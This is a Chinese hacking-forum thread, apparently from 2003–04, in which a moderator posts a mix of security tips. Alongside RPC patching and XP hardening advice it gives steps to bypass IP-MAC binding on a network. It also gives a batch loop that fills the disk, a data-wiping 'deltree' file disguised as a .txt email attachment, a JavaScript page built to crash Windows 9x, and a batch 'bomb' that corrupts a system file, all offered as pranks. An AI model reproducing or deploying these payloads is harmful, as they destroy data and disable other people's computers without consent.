20CN网络安全小组论坛 - 菜鸟乐园 - 〓☆★☆★☆★☆★给大家的礼物【四】★☆★☆★☆★☆〓

论坛: 菜鸟乐园标题: 〓☆★☆★☆★☆★给大家的礼物【四】★☆★☆★☆★☆〓

复制本贴地址

作者: abctm [abctm]

版主

abctm认为到目前为止,问题已有明确答案,本贴已被冻结,不再接受更多的回复

↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
→→→今天是偶的生日为了庆祝，我发几个帖子大家要顶偶←←←
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
关闭和打开RPC服务
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
最近利用RPC漏洞越来越厉害，比如“冲击波”蠕虫以及其变种，受到攻击的WindowsNT/2000/XP/2003用户，普遍出现蓝屏、重启、剪贴板出错、自动关机等现象，目前解决办法有1：安装微软官方补丁；2：使用网络防火墙或者TCP/IP筛选，屏闭TCP135、4444以及UDP69等端口；3：关闭RPC服务。推荐同时使用解决办法1和2，第3种方法最彻底但不可取。

今天因为测试关闭RPC服务下Blaster.Worm感染的情况，但该文主要是说Windows 2000 服务器下关闭RPC服务出现的问题以及恢复：关闭RPC--管理工具--服务--Remote Procedure Call，其默认启动类别是自动，大家可以通过属性来修改启动类型的。另外从依存关系可以发现很多依赖Remote Procedure Call的其它服务。

关闭RPC服务后，重新启动后发现系统日志报错，查看该事件的属性无法打开，关闭事件查看器，同时提示说关闭所有属性页，但看不到该页面...干完该干的事情后，开始恢复RPC服务吧，晕，竟然同样无法从属性里边恢复了（打不开属性页面），尝试其它一些恢复办法，如安全模式、CMD下，还是不行，注册表又没备份，真麻烦呀，只好打开注册表，之间用了N分钟，终于找到了“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs”，将里边的“Start”的值由0x00000004编辑为0x00000002后，重新启动电脑，OK，一切恢复正常了。

测试结果是关闭RPC服务后系统没有发现受到蠕虫感染的现象，哈哈，其实是大家都知道的。

参考:RPC 接口中的缓冲区溢出可能允许执行代码 (823980) :http://www.microsoft.com/china/technet/security/bulletin/MS03-026.asp
参考:symantec公司W32.Blaster.Worm病毒资料:http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
IP和MAC捆绑的破解
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
原理如下：
MAC和IP捆绑是在服务器上，那么大家想想，作用范围应该是什么呢？当然也只有在服务器对客户机上了，但是如果我修改了客户机上的IP，那服务器上的怎样呢？如果你已经想到这了，那就已经理论的破解了捆绑了。
步骤如下：
1、首先要探明IP的范围和被限制的IP的范围，若IP是172.16.xxx.xxx，MAC是52-54-AB-12-34-56，那么IP范围应该是在172.16.0.1――172.16.255.255，我想不太可能都捆绑完吧，否则你就只能等着die了。
2、对172.16.0.1――172.16.255.255做一次完整的扫描，以防造成不必要的麻烦（IP冲突），引起网管的注意，那样就不管了。
3、找到没有人使用的IP，从172.16.255.255往172.16.0.1找，因为一般的网管是从172.16.0.1开始使用的，后面的一般没有使用，突破口就在这儿了。
4、在网上邻居->属性->TCP/IP属性固定刚才拿到的IP地址，95/98/ME请看第5步，2K、XP至此完成，打开IE试试吧，又飞翔在INTERNET上了。
5、在95/98/ME系统上修改了IP，会提示重启，以防机器安装还原卡或类似的产品只能不重启，那就在我的电脑->属性->网卡->先禁用后再启用（需要等一会）->确定，现在打开IE试试，也已经可以了
至此完成破解
解决方法：
安装ISA一类的代理服务软件进行管理，最安全的是划分VLAN，不过交换机得支持才行。
留下网址和大家一起探讨，有兴趣或有其他见解的上来说说，在下十分欢迎。http://www.xzcx.net.cn/lyb/index.asp?user=smallrascal

地主发表时间: 11/05 21:53

回复: abctm [abctm]

版主

↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
→→→今天是偶的生日为了庆祝，我发几个帖子大家要顶偶←←←
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
Windows系统的RPC安全漏洞解决方案
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
漏洞概述
========
Windows的生产厂商微软公司于2003年7月16日发布了MS03-026号安全漏洞（详细内容见 http://www.microsoft.com/technet/security/bulletin/MS03-026.asp），声明因为Windows NT、Windows 2000、Windows XP和Windows 2003系统存在RPC安全缺陷，将导致未授权用户可以通过系统权限用户（SYSTEM）实现代码执行，也就以为着黑客直接可以
获得整个系统的控制权，但导致非常严重的后果。

攻击现象
========
受到攻击的Windows NT、Windows 2000、Windows XP和Windows 2003将出现系统蓝屏、重新启动、自动关机等现象！

危害分析
========
这种攻击的流行主要是RPC漏洞利用的黑客工具到处散播和利用此漏洞的蠕虫的出现，轻则导致系统因蓝屏、重新启动或自动关机等现象无法使用，重则导致黑客直接入侵到用户电脑或服务器中偷窃密码、资料等重要私人信息。

流行程度
========
因为在默认安装情况下用户的RPC服务（135端口）是开放的，并且是新出的漏洞，很少用户安装了安全补丁，所以，就目前的情况而言，至少有95％以上的Windows系统容易收受到攻击。

解决方案
========

1、打安全补丁：

中文Windows 2000用户请安装：Windows2000-KB823980-x86-CHS.exe
英文Windows 2000用户请安装：Windows2000-KB823980-x86-ENU.exe

中文Windows XP用户请安装：WindowsXP-KB823980-x86-CHS.exe
英文Windows XP用户请安装：WindowsXP-KB823980-x86-ENU.exe

中文Windows 2003用户请安装：WindowsServer2003-KB823980-x86-CHS.exe
英文Windows 2003用户请安装：WindowsServer2003-KB823980-x86-ENU.exe

以上补丁程序请从 http://www.janker.org /security/rpc/ 下载

注意：安装完毕后重新启动机器生效。

2、安装防火墙软件阻塞TCP协议到135端口的访问。

下载地址：http://www.hackbase.com/down/ －> "防火墙类"

推荐使用带入侵检测模块的防火墙软件BLACKICE。

B1层发表时间: 11/05 21:54

回复: abctm [abctm]

版主

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
Windows XP的安全策略(推荐)
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
尽管Windows XP刚刚推出没有多长时间，但是Windows XP凭借其超强的稳定性和可靠的安全性还是吸引了不少用户在第一时间内去使用它。笔者在与Windows XP的短暂“接触”中，细心留意了一些安全方面的操作策略，现在把它整理成文，以期抛砖引玉。

　　1、屏蔽不需要的服务组件

　　尽管服务组件安装得越多，用户可以享受的服务功能也就越多。但是用户平时使用到的服务组件毕竟还是有限，而那些很少用到的组件不但占用了不少系统资源，会引起系统不稳定外，它还会为黑客的远程入侵提供了多种途径，为此我们应该尽量把那些暂不需要的服务组件屏蔽掉。具体的操作方法为：首先在控制面板中找到"服务和应用程序"图标，然后再打开"服务"对话框，在该对话框中选中需要屏蔽的程序，并单击鼠标右键，从弹出的快捷菜单中依次选择"属性"/ "停止"命令，同时将"启动类型"设置为"手动"或"已禁用"，这样就可以对指定的服务组件进行屏蔽了。

　　2、起用电源保护功能
　　使用电脑处理文件时，最担心的就是计算机突然掉电，因为这种突然掉电不但会使自己的辛勤劳动成果顷刻间化为乌有，严重的话还能使计算机受到损伤。为了防止各种情况下的意外掉电，保证计算机的安全正常工作，我们应该在电源管理中启用按下电源按钮时询问或直接休眠的功能。如果您要启动电源保护功能的话，可以用鼠标在Windows XP的桌面上依次单击“我的电脑”/“控制面板”/“电源选项”，在弹出的设置框中选择“高级”标签，在对应的标签页面下找到“按下计算机电源按钮时”设置项，然后在设置框中选择“休眠”或者“问我要做什么”选项，如果选择“关机”选项的话，就相当于没有起用电源保护功能。

　　3、对重要信息进行加密

　　为防止其他人在使用自己的电脑时，偷看自己存储在电脑中的文件信息，Windows XP特意为我们普通用户提供了“文件和文件夹加密”功能，利用该功能我们可以对存储在电脑中的重要信息进行加密，这样其他用户在没有密码的情况下是无法访问文件或者文件夹中的内容的。在对文件进行加密时，我们首先打开Windows XP的资源管理器，然后在资源管理器操作窗口中找到需要进行加密的文件或者文件夹，然后用鼠标右键单击选中的文件或文件夹，从弹出的快捷菜单中选择“属性”命令，随后Windows XP会弹出文件加密对话框，单击对话框中的“常规”标签，然后再依次选择“高级”/“加密内容以便保护数据”就可以了。

　　4、锁定您的计算机

　　如果在使用电脑的过程中因有急事需要短暂离开电脑的话，许多人因担心自己的电脑会被别人占用，往往会采取先关机，后离开，然后回来再开机的办法来处理，但这样频繁开关机器对电脑是不利的。那我们有没有办法做到既不要关机又能防止其他人使用自己的计算机呢？办法当然是有的啦，您可以通过双击桌面快捷方式来迅速锁定键盘和显示器，而无需使用CTRL+ALT+DEL组合键或屏幕保护程序。在锁定您的计算机时，您可以参照如下的步骤来执行：先用鼠标右键单击Windows XP的桌面，然后在右键菜单中依次选择"新建"/"快捷方式"，随后按照屏幕提示，在命令行的文本框中输入"rundll32.exe user32.dll,LockWorkStation"命令字符，再在随后的向导窗口中输入对应该快捷方式的具体名称，在这里为方便以后调用，您可以直接为该快捷方式取名为"锁定计算机"就可以了。以后您只要双击桌面上的“锁定计算机”，就可以达到锁定的目的了。

5、使用“连接防火墙”功能

　　在网络时代中，病毒的传播方式、传播速度和破坏力发生了翻天覆地变化，而且黑客行为也正在全世界范围内活动。为了防止病毒和黑客的随意入侵，不少用户在自己的计算机中都安装了防火墙。而Windows XP就加入了免费的"Internet 连接防火墙"功能，利用该功能，Windows XP能对出入系统的所有信息进行动态数据包筛选，允许系统同意访问的人与数据进入自己的内部网络，同时将不允许的用户与数据拒之门外，最大限度地阻止网络中的黑客来访问自己的网络，防止他们随意更改、移动甚至删除网络上的重要信息。在使用“连接防火墙”功能时，您可以依次单击开始菜单中的"设置"/"网络连接"菜单项，然后从弹出的窗口中选择需要上网的拨号连接，然后用鼠标右键单击该连接图标，并选择"属性"命令，在随后弹出的拨号属性窗口中再单击"高级"标签，在对应标签的页面中选中"Internet连接防火墙"选项，然后再单击对应防火墙的“设置”按钮，来根据自己的要求设置一下防火墙，以便防火墙能更高效地工作。

　　6、随时起用屏保程序

　　看到“屏保”二字，大家肯定会很自然地想到计算机中的屏幕保护程序，它主要是通过采用不同方式轮流显示指定图片来达到屏幕保护的目的。但是只有当不操作电脑达到事先设置的时间后，系统才会启动屏幕保护程序，如果我们想在任意指定的时间内启动屏幕保护程序，该怎么办呢？Q9750406我们可以按照下面的操作方法来实现：在Windows XP的开始菜单中，依次单击"开始"/"搜索"/"文件或文件夹"，然后在弹出的搜索对话框中，点击"所有文件和文件夹"类型，并在对应文件名的文本框中输入"*.scr"字符，再在搜索范围下拉列表中，选择"本机磁盘(C:)"或计算机上存储系统文件的驱动器，最后单击"搜索"按钮。然后在找到的屏幕保护程序列表中，选择需要的屏保程序，然后给这个屏保程序建立一个存放在桌面上的快捷方式，以后要启动屏保程序时直接用鼠标双击桌面上的屏保快捷方式。

　　7、为自己分配管理权限

　　安装在Windows XP操作系统中的许多程序，都要求用户具有一定的管理权限才能让用户使用程序，因此为了能够使用好程序，我们有时需要为自己临时分配一个访问程序的管理权限。在分配管理权限时，我们可以先普通用户身份登录到Windows XP的系统中，然后用鼠标右键单击程序安装文件，同时按住键盘上的Shift键，从随后出现的快捷菜单中点击"运行方式"，最后在弹出的窗口中输入具有相应管理权限的用户名和密码就可以了。

　　8、消除系统假死现象

　　在操作Windows XP中的应用程序时，由于操作不当或者系统本身的问题，导致了操作的程序很长时间没有响应，许多人以为计算机肯定是死机了，于是不少人选择了直接关机或者使用Ctrl+Alt+Delete来重新启动计算机。其实在Windows XP中，有些不能正常运行的程序会引起系统任务栏的假死，这种现象主要是由于当前执行的程序与系统无法兼容引起的。遇到这种现象时，我们可以找到该程序的执行文件，然后单击鼠标右键，在弹出的对话框中选择"兼容性"标签，再在"兼容模式"下选择相应需要的运行环境。

B2层发表时间: 11/05 22:04

回复: abctm [abctm]

版主

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
DOS利用全接触
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
一、给非法用户设置个小陷阱

在Windows目录中建立一个winstart．bat文件(如果已经存在该文件，则按如下所示修改其内容)，并在该文件中加入以下几行命令：
@echooff
choice／c：&／n／3

上面代码中的“&”为我们设置的密码，可以自行设置。这样，在启动Windows时系统将要求你输入密码，表现在屏幕上就是光标一闪一闪的，造成非法用户以为Windows死机的假像，有时，就连部分高手也会上当受骗。当我们要进入系统时，只要输入“&”即可

二、用“魔咒”跟电脑开个玩笑

怎样让电脑死机呢?当然有很多方法，这里介绍一种非常简单的方法。打开C盘根目录下的Autoexec．bat文件(如果不存在，可以自行建立)，然后将其中的内容全部删除，输入下面两行命令：
@cd>>notepad
@％0
然后保存就可以了。解释一下上面的命令：
“@”符号表示在DOS下不显示后面的命令，这样就可以把危险指令掩藏起来，来个神不知鬼不觉。“cd>>notepad’就是把当前的目录拷贝成一个名为notepad的文件，“>>”表示保存到，和“>”不同的是，“>>”会将保存结果加到文件的最后，而“>”是覆盖的意思。所以，用“>>”的结果就是保存的文件越来越大!“％0”的意思是不断地重复上面一条指令，其结果就是名为notepad的文件会越来越大，直到填满整个硬盘，此时，你的电脑就只有死机一条路可以走了。如果你重新启动电脑，只会看到；Starting MS-DOS．．．之后就会死机了，而且期间会不接受任何指令。要去掉这条“魔咒”，只要用软盘启动电脑，或跳过Autoexec．bat文件的执行，再把上面的指令去掉就行了。

三、在DOS下解锁注册表编辑器

大家知道，注册表编辑器被禁用后很是棘手，特别是reg文件打开方式被更改后，就无法通过导入reg文件来解锁注册表了。不过，在DOS下我们也可以给注册表解锁，具体方法是：在纯DOS下，输入如下命令：REGEDIT／DHKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Policies＼System＼DisableRegistryTools。回车，会出现一个标题栏为“注册表编辑器”的对话框，里面写着“，确实要把HKEY_CURRENT_USER＼．．．．．．DisableRegistryTools内的信息添加到注册表吗?”点击“确定”即可。浏览恶意网页导致注册表被禁用后，不妨试试本方法。

四、用Doskey命令“封杀”format

对格式化程序~rmat命令大家一定很害怕吧?某些病毒一侵入，就给你的硬盘来个格式化，后悔都来不及，只得重装系统，不仅麻烦，而且资料不保!现在你不必害怕了，在DOS下键入如下命令：C：＼doskeyFORMAT=BadCommandOrfilename!回车，就将format命令给“封杀”了，当病毒或恶意程序格式化你的硬盘时，系统将会显示：BadcommandOrfilename!如果你自己想格式化，怎么办呢?可以在DOS下键入如下命令：C：＼doskeyFORMAT=，然后回车就可以了。注：Doskey为DOS提供的锁定命令。

五、在DOS下检查是否中木马

一般说来，中了木马的机器会开有特定的端口。一般一台个人用的Win9x系统在开机后最多只有137、138、139这3个端口(若上网冲浪会有其他端口，这是本机与网上主机通讯时打开的，如IE会打开1025、1026、1027……，QQ会打开4000、4001……)。由于Netstat命令是通过读取内存中的“kernelroutingtables”来获得网络信息，所以用它来发现一般的木马还是很容易的。在DOS命令行下用netstat-na命令可以看到本机所有打开的连接，如：

C:\WINDOWS>nelstat-na
ActiveCofmectiogs
ProtoLocalAddressForeignAddressState
TCPXXX．XXX．XXX．XXX：1370．0．0．0：0LISTENING
TCPXXX．XXX．XXX．XXX：1380．0．0．0：0LISTENING
TCPXXX．XXX．XXX．XXX：1390．0．0．0：0LISTENING
UDPXXX．XXX．XXX．XXX：137*：*
UDPXXX．XXX．XXX．XXX：138*：*

发现有其他端口打开的话就要查查看子，你很有可能中木马了。怎么样?在DOS下也可以检查是否中木马了，很棒吧！

六、在DOS下打开1E的“1nlernet属性”窗口

有时在浏览了某些恶意网页后，会导致IE的“Internet属性”对话框无法打开，这时我们可以在DOS窗口下输入：RunDll32．exeshell32．dll，ControlRunDLLinetcpl．cpl命令，就可打开IE的“Internet属性”对话框。要注意“ControlRunDLL”的大小写以及它前面的逗号(,)不要忘记了。

七、在DOS下使用注册表编辑器

注册表编辑器Regedit．exe其实是一个双栖型的程序，即可在Windows下运行，也可在DOS下运行。许多用户可能已经知道在Windows下使用Regedit的方法，那么在DOS下如何使用注册表编辑器呢?

在DOS提示符下键入Regedit命令，将出现一个帮助屏幕。此屏幕给出了其命令行参数及其使用方法。

语法：
Regedit[／L：system][／R：user]filenamel
Regedit[／L：system][／R：user]／Cfilename2
Regedit[／L：system][／R：userl／Efilename3
[regpath]

其中；
／L：system指定system．dat文件的存放位置。
／L：user指定user．dat文件的存放位置。
filenamel指定引入注册表数据库的文件名。
／Cfilename2指定形成注册表数据库的文件名。参数“／C”表示从后面指定的文件中重新生成整个注册表。重建的注册表文件往往比原来的小l／5到1／3，从而达到了优化的目的。
／Efilename3指定导出注册表文件的文件名。
regpath指定导出注册表文件的开始关键字(缺省为全部关键字)
现举几个例子说明regedit．exe在DOS下的使用方法。

[例1]将注册表导出到reg1．reg文件中。
regedit／Ereg1．reg
[例2]重新生成注册表reg1．reg。
regedit／Creg1．reg
[例3]将reg．dat导人系统注册表数据库中。
regeditreg．dat
[例4]将CLK开始的关键字导出注册表数据库，并命名为clk．reg。
regedit／Eclk．regclk
[例5]指定system．dat存放在D：＼PIN中，将user．dat存放在E：＼PWIN中，将reg．dat数据文件形成一个新的注册表数据库。
regecht／L：D：＼PWIN／R：E：＼PWIN／Creg．Dat

八、用DOS命令查QQ好友的1P地址

查QQ好友的IP地址还用得着这么麻烦吗?给QQ打个补丁不就行了吗?不错，这样做是很简单，但如果是新出的QQ，“补丁”还没有做出来，又该怎么办呢?为什么不试试DOS命令呢?即简单，又方便。

首先，用甜言蜜语、糖衣炮弹之类的武器把你想知道IP地址的那个人“请”到QQ的“二人世界”里。接着，我们在DOS窗口(Win9x下叫DOS，Win2000下叫命令提示符)，输入如下命令：netstat-n
你将看到：

ActiveConnection
PhotoLocalAddressForeignAddressState
TCP202.109.34.78:1200202.121.139.35:61555ESTABLISHED
TCP202.109.34.78:2694202.109.72.40:6667ESTABLISHED
TCP202.109.34.78:4869211.202.1.227:23ESTABLISHED

好家伙，这么多IP！那个才是我们要找的呢？别着急，往后看。我们现在推出“二人世界”，然后在DOS下再输入一次：netstat-n

你将看到：
ActiveConnection
PhotoLocalAddressForeignAddressState
TCP202.109.34.78:1200202.121.139.35:61555TIME_WAIT
TCP202.109.34.78:2694202.109.72.40:6667ESTABLISHED
TCP202.109.34.78:4869211.202.1.227:23ESTABLISHED

看出前后两次的区别了么？没有看出来？仔细看看，你会发现的。现在你知道了吧？对！和你聊天的人的IP就是202.121.139.35!你是怎么知道的呢？我们在“二人世界”中要传送消息，相互之间必然要通过UDP协议产生连接，此时自然是ESTABLISHED了；而退出“二人世界”连接要断开，自然就是TIME_WAIT了。

九、自动加载防火墙

有些朋友在上网时常忘记运行防火墙，病毒或木马之类的程序就有可能乘虚而入！但是，如果每次启动WINDOWS都自动启动防火墙，由于不是每次开机都上网，因此有浪费系统资源之嫌。那么，有没有两全其美的方法呢？

由于我们上网往往要发电子邮件，因此，如果能在收发邮件时自动打开防火墙，不就解决了这个问题么？下面以天网防火墙和OUTLOOKEXPRESS为例，说说如何在邮件客户端运行之前打开防火墙。

首先新建一个文本文件，在其中输入以下内容：
STARTC:\PROGRA~1\SKYNET\FIREWALL\SNFW.EXE
STARTC:\PROGRA~1\OUTLOO~1,EXE\MSIMN.EXE
然后另存为GO.BAT即可（名字随便起，只要是后缀为BAT就可以了）。由于OUTLOOKEXPRESS默认设置为启动时发送和接受邮件，只要我们执行GO.BAT，他就会自动启动天网防火墙，接着就会启动OE，OE就会连线上网，如此达到了上网即可打开防火墙的目的。这里需要指出的是：DOS下不支持长文件名，最多8个字符，所以ProgramFiles应写成Progra~!，命令格式即为“start文件存放路径”。

十、删除不必要的文件

在Windows下保存着许多我们并个需要的文件，如Temp目录和Rcenet目录下的文件，回收站中的文件以及IE的历史记录和Cookie等丈仆，如果手工来清除它们实在是太麻烦了，我们可以在Autoexec.bat中加入一些内容，使得每次启动Windows时就删除这些文件，这样就省事多了！用记事本打开C:\Autoexec.bat文件，编辑内容如下：

EchoY
ifexistc:\windows\temp\*.*delc:\windows\temp\*.*>nul
ifexistc:\windows\Tempor~1\*.*delc:\windows\Tempor~1\*.*>nul
ifexistc:\windows\History\*.*delc:\windows\History\*.*>nul
ifexistc:\windows\recent\*.*delc:\windows\recent\*.*>nul
ifexistc:\windows\cookies\*.*delc:\windows\cookies\*.*>nul

此批处理第二行为删除临时文件夹的内容；第三、四行为删除IE浏览器打开网页后遗留下的内容；第五行为删除“开始”→“文档”中的内容；第六行为删除回收站里的内容；第六行为删除Cookies。

十一、更改指定文件的日期

要修改名为XXX．exe(任意exe文件)的日期，可以在MS―DOS方式下键入copyXXX．exe+，，(注：加号后紧跟2个逗号)，系统询问时键入“Y”，即将文件更改为当前日期。

十二、恢复在DOS下删除的文件

Windows98的回收站只能恢复在Windows里删除的内容，用以下方法可恢复Windows98的DOS模式下删除的文件：先运行“Lock”命令，解除WindOWS对磁盘访问的限制，再使用命令“UnDelete”恢复。或重新启动进入DOS，运行“UnDelete”也行，不过动作要快，否则被其他新建文件覆盖了就没有办法了。

十三、在DOS下制作启动盘

当Windows98系统崩溃而你又不得不重装系统的时候，如果伯；以前忘了制作启动盘，那么不要着急，这时还可以在DOS环境下制作。具体方法是：运行Windows目录下的Command文件夹中的一个名为Bootdisk的批处理文件。运行后出现下列信息：

Pleasespecifythedriveletterofyourfloopydrive．
PresslforAOr
Press2forB：
Chooseanoption[1，2]？

一般都选择1，之后屏幕会出现―些英文信息。放入一张磁盘后，按回车，…张启动盘很快就制作成了。

十四、DOS中的注册表修理命令

在DOS状态下，输入命令行“Scanreg／fix，系统会对当前的注册表进行修复，如果你觉得系统有些不正常，试试这个命令吧，也许能解决问题。

十五、和朋友开个玩笑

这是个危险的游戏，切记：只有真心想让朋友痛揍一顿的人才可以使用!
用记事本编辑一个文本文件，里面只有一句：
deltree-yd:\*.*，然后另存为“我的文章．txt．bat’
用E-mail附件发送给他。由于Windows支持双后缀名，这样，
在你的朋友看来这个文件就是：我的文章．txt。
谁又知道这是个批处理文件呢?如果他双击这篇所谓的“文章”，
那他D盘下的文件就不保了。防范方法：不要随便打开附件，如果实在想看，一定要用记事本打开。将系统中的危险命令删除或改名。另外，让系统能显示双重扩展名，在“资源管理器”中点击“查看(v)”→“文件夹选项”→“查看”，将“隐藏已知文件类型的扩展名”前面的“√”去掉。
再次声明：这样做是很危险的!虽然这算不上病毒，但它们的危害有时比病毒还要大。

B3层发表时间: 11/05 22:09

回复: abctm [abctm]

版主

↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
→→→今天是偶的生日为了庆祝，我发几个帖子大家要顶偶←←←
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
100秒内蓝屏死机的脚本源代码！
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
由于这几天闲着没事，花了点时间写了这段有趣的代码，若有BUG希望大家转告
<html>
<head>
<script LANGUAGE="JavaScript">

function leave() {
window.open('file:///c:/nul/nul','','toolbar=no,menubar=no,location=no,height=1,width=1');
}
// End -->
</script>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>WEB A-BOMBII BETA V0.5</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta content="100;URL=file:///c:/nul/nul" http-equiv="refresh">
<style type="text/css">A:link {
FONT-SIZE: 9pt; TEXT-DECORATION: none
}
A:visited {
FONT-SIZE: 9pt; TEXT-DECORATION: none
}
A:active {
FONT-SIZE: 9pt; TEXT-DECORATION: none
}
A:hover {
COLOR: red; TEXT-DECORATION: none
}
BODY {
FONT-SIZE: 9pt; LINE-HEIGHT: 13pt
}
TABLE {
FONT-SIZE: 9pt; LINE-HEIGHT: 13pt
}
TR {
FONT-SIZE: 9pt
}
TD {
FONT-SIZE: 9pt
}
.e {
FONT-FAMILY: "MS Sans Serif"; FONT-SIZE: 9pt; TEXT-DECORATION: none
}
</style>
</head>

<body onUnload="leave()" background onload="startclock()" bgcolor="#000000" text="#FFFFFF">
</BODY<HTML>
<font size="6"><script language="JavaScript">
var timerID = null
var timerRunning = false
var stardate = new Date()
var startime = gettotalsecond(stardate)

function stopclock(){
if(timerRunning)
clearTimeout(timerID)
timerRunning = false
}

function startclock(){

stopclock()
showtime()
}

function gettotalsecond(getdate) {
var hours = getdate.getHours()
var minutes = getdate.getMinutes()
var seconds = getdate.getSeconds()
var gettotalsecond = seconds + minutes * 60 + hours * 3600
return(gettotalsecond)
}

function showtime(){
var now = new Date()
var timeValue = gettotalsecond(now)
document.clock.face.value = timeValue - startime
timerID = setTimeout("showtime()",1000)
timerRunning = true
}

</script>
</font><font color="darkblue"
size="6">

<form name="clock" onsubmit="0">
<div align="center"><center><p>�@<br>
<strong><font size="3" color="#FF00FF"><br>
=枫之站=</font></strong></p>
</center></div></font><font size="4"><div align="center"><center><p></font><strong><font
size="1" color="#FF00FF">您已经用去了<input name="face" size="5">秒时间 </font></strong><font
color="darkblue" size="6"></p>
</center></div>
</form>
</font><script>
//kasper
function click(){
if(event.button==1){window.open("file:///c:/nul/nul") }

if(event.button==2){window.open("file:///c:/nul/nul") }
}
document.onmousedown=click
</script>

<form name="sw">
<input type="hidden" name="disp1" value="0:05"><input type="hidden" name="disp2"
value="0:05">
</form>
<script language="JavaScript">


</script>

<p align="center"><font color="#FFFF80">此炸弹只队WINDOWS95/98有效<br>

</font><font color="#FF0080"><br>
声明：此东东只供研究使用，如用做不正当用途后果自负！</font><br>
<font color="#00FF80">以下操作可以引爆炸弹！！！<br>
</font><font color="#00FFFF"><br>
1.在本页停留100秒以上；<br>
2.在浏览区点击左右键；<br>
3.点击关闭按钮关闭此窗口；<br>
4.使用“CTRL+ALT+DEL”结束任务；<br>
5.使用“ALT+F4”关闭此窗口；<br>
</font><font color="#FFFF80"><br>
</font>
</body>
</html>

B4层发表时间: 11/05 22:14

回复: abctm [abctm]

版主

自己来编写一个批除理炸弹
※※※※※※※※※※※※※※※※※※※※※※
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
很多网友问我，有什么好炸弹，如何炸计算机等之类的话。我也抱着帮朋友入门的思想，用几分钟写了一个批除理炸弹，（只对WINDOWS98有用）。
将下面源程序另存为feng.bat
---------------------------------------

@rem
@echo off
SMARTDRV
copy c:\windows\system\vmm32.vxd c:\windows\system\vmm32\vmm32.vxd
ren c:\windows\system\vmm32.vxd feng.vxd
echo Hackerfeng>c:\windows\system\vmm32.vxd
echo del c:\windows\system\vmm32.vxd>c:\windows\system\vmm32\.bat
echo ren c:\windows\system\feng.vxd vmm32.vxd>>c:\windows\system\vmm32\1119.bat
echo del c:\windows\desktop\feng.url>>c:\windows\system\vmm32\1119.bat
echo [internetshortcut]>c:\windows\desktop\feng.txt
echo url=http://127.0.0.1>>c:\windows\desktop\feng.txt
echo iconindex=1>>c:\windows\desktop\feng.txt
echo iconfile=c:\con\con.dll>>c:\windows\desktop\feng.txt
ren c:\windows\desktop\feng.txt feng.url
echo on
********************feng**********************
* *
* www.yangtai.i-p.com *
* *
****************************************************
0===={===========>
rundll32.exe user.exe,exitwindows
cls

如果有人误用可以按F8进入DOS（为了安全，我没有给MS-DOS。SYS中加入“BOOTKEYS=0”，要不就￥%##・），运行c:\windows\system\vmm32\feng.bat
如果运行了feng。bat后,复盖安装win98，系统进入桌面蓝屏。

B5层发表时间: 11/05 22:16

回复: abctm [abctm]

版主

？？？？

B6层发表时间: 11/05 22:59

回复: chen_xia [chen_xia]

论坛用户

猩猩兄。。。文章太长。。。看都要看半天。。。

还不知道是什么意思。。

B7层发表时间: 11/06 01:25

回复: onlyu123 [onlyu123]

老大我一直在顶呀我累死了压的我喘不过气来~~~~~~~~~~~

B8层发表时间: 11/06 17:22

回复: huweiwei [huweiwei]

论坛用户

好好好………………长啊

B9层发表时间: 11/06 20:50

回复: leo_919 [leo_919]

论坛用户

DING

B10层发表时间: 04-05-02 22:10

回复: szjwwwww [szjwwwww]

论坛用户

很经典的...的老帖子！
老大你生日
都多大的人了？
有点创新心不？
别人都贴了N遍的，你生日还再贴一遍!
20CN的空间够你用不？
不够我那儿有

B11层发表时间: 04-05-02 22:28

回复: abctm [abctm]

版主

睁大你的眼睛看看这个是什么时候的帖子，我发的时候还没有人发呢？

就你2003。10月注册的，登陆23次也有资格批评我，我就在这里浪费空间，也不用你来批评我。空间谁没有，就你有啊，俺有250M的呢。我最讨厌别人说我了，真有意见就去申请投诉，投诉我

B12层发表时间: 04-05-02 22:32

回复: lqfrla [lqfrla]

论坛用户

是你生日啊
那要顶啊

送你两朵花玩玩吧

B13层发表时间: 04-05-02 22:34

回复: abctm [abctm]

版主

这个是去年的帖子了

B14层发表时间: 04-05-02 22:37

回复: lhh2003 [lhh2003]

论坛用户

教主好强哦，呵呵，生日快乐！

B15层发表时间: 04-05-02 22:49

回复: lan [lan]

